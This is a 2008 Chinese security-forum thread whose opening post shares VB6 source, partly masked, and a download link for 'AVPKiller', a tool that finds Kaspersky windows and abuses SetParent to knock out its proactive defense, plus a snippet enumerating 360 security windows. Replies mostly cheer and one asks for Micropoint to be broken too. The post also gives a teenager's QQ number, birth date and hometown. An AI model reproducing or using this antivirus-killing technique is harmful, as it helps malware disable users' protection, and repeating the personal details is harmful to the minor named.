点饭的百度空间
银牌会员
积分 2315
发帖 2236
注册 2007-11-30
|
#1 【QQ517826104】(VB6)废掉卡巴主动防御KIS8 & KIS2009,试验成功!
相关主题:
【QQ517826104】(VB6)超简单方法破解微点的自我保护(微点已封)
http://bbs.micropoint.com.cn/sho ... ghlight=QQ517826104
【QQ517826104】为什么SetParent还能用来过微点……
http://bbs.micropoint.com.cn/sho ... ghlight=QQ517826104
【QQ517826104】想打造个性化的微点.
http://bbs.micropoint.com.cn/sho ... ghlight=QQ517826104
【QQ517826104】 16岁
生日: 1992年 10月03日 (天秤座) 血型: A 出生地: 广西 - 贺州 - 钟山县
就读过的学校: ZSYZ
个人简介: A super VB lover
【QQ517826104】(VB6)废掉卡巴主动防御,试验成功!
两个Form,一个CommandButton (cmdKill) 。没有Timer。
源码
Option Explicit
Private Declare Function IsWindow Lib "user32.dll" (ByVal hWnd As Long) As Long
Private Declare Function SetParent Lib "user32" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long
Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hWnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Private****()
Dim i As Single
For i = 1 To ****# '遍历所有 hWnd
If **** '是可用的窗口
Dim str As String
str = Space(255)
Call G****(i, str, 255)
str = LCase(str)
If InStr(*****<> 0 Then '是AVP的。。。
Debug.Print str
Load Form2 '调用 SetParent 漏洞攻击卡巴
SetParent i, Form2.hWnd
Unload Form2 '挂了,嘿嘿~
End If
End If
Next i
End Sub
最终可执行文件
AVPKiller.rar http://www.0ginr.com/bbs/att****t.php?aid=715 (13.27 KB) Important:
由于用的是For语句获取句柄,
会消耗大量系统资源!
运行时尽量关闭没用的程序,以免死机!!!
建议配置较低的机器不要随意尝试!!!
Update Notes:
其实我早就在做这个试验了,
不过一直没有成功——原因仅仅是漏了一行Code!!!
这个:
str = LCase(str)气死。。。
教训就是以后不管是考试还是写程序一定要细心!
说到考试,中考还剩几天了。。哎。。
附件:(转自同一博客的同一帖子的某两个评论)
找到360所有窗口的句柄(自我保护状态下,包括保险箱)。
Option Explicit
Private Declare Function IsWindow Lib "user32.dll" (ByVal hWnd As Long) As Long
Private Declare Function SetParent Lib "user32" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long
Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hWnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Private Sub cmdKill_Click()
Dim i As Single
For i = 1 To 4294967294#
If IsWindow(i) <> 0 Then
Dim str As String
str = Space(255)
Call GetClassName(i, str, 255)
str = LCase(str)
If InStr(str, "360") <> 0 Then
Debug.Print "类名:" & str & "句柄:" & i
End If
End If
Next i
End Sub
MJ0011:楼上这方法会导致WIN32K系统占用大量内存,最终导致系统响应缓慢
正确的方法应是从hwnd中getnext的方式,或者用getwindow
classname也可从hwnd中获取,以防GetClassName函数被HOOK
可惜的是,就算你拿到窗口句柄,也并不能做什么了
[ Last edited by 点饭的百度空间 on 2008-12-2 at 17:17 ]
| |
※ ※ ※ 本文纯属【点饭的百度空间】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
你的微笑 is 微点的骄傲!
http://hi.baidu.com/new/micropoint |
|
|
2008-6-16 14:16 |
|
huhensex
新手上路
积分 11
发帖 11
注册 2008-8-20
|
#2
支持楼主试验,笔者是菜鸟,看不懂源代码,仅从精神上支持了
| |
※ ※ ※ 本文纯属【huhensex】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2008-8-20 08:18 |
|
hljking
注册用户
积分 180
发帖 180
注册 2007-4-11
来自 hlj
|
#3
强烈支持楼主!希望你更牛XXXX点
| |
※ ※ ※ 本文纯属【hljking】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
【 东 方 微 点 】 √
我 看 行 ! 我是从不说假话地,更不屑说大话~~! |
|
|
|
2008-8-21 15:14 |
|
putin
中级用户
积分 258
发帖 261
注册 2007-1-19
|
#4
希望你也能破掉微点的防御!
| |
※ ※ ※ 本文纯属【putin】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2008-8-22 15:18 |
|
qq200878
中级用户
积分 456
发帖 452
注册 2007-11-17
|
#5
见识过了
| |
※ ※ ※ 本文纯属【qq200878】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2008-8-22 16:04 |
|
点饭的百度空间
银牌会员
积分 2315
发帖 2236
注册 2007-11-30
|
|
|
2008-12-2 17:12 |
|
独孤不平
注册用户
积分 128
发帖 122
注册 2008-10-3
|
#7
| Quote: | Originally posted by 点饭的百度空间 at 2008-12-2 17:12:
顶 |
|
强大的人,自己顶自己,是不是有什么问题呢
| |
※ ※ ※ 本文纯属【独孤不平】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2008-12-2 20:42 |
|
a0531101
中级用户
积分 256
发帖 256
注册 2008-7-24
|
#8
只看懂几行代码!
| |
※ ※ ※ 本文纯属【a0531101】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2008-12-6 09:57 |
|
dosschen
新手上路
积分 1
发帖 1
注册 2009-4-23
|
#9 !!!!
顶吗!!!!
| |
※ ※ ※ 本文纯属【dosschen】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2009-4-23 03:09 |
|
小小刀
高级用户
我要换头像!
积分 889
发帖 884
注册 2007-6-6
|
#10
| Quote: | Originally posted by 独孤不平 at 2008-12-2 20:42:
强大的人,自己顶自己,是不是有什么问题呢 |
|
楼主是转帖
| |
※ ※ ※ 本文纯属【小小刀】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
我什么时候才能自定义头像。。。。。。 |
|
|
|
2009-4-24 10:26 |
|
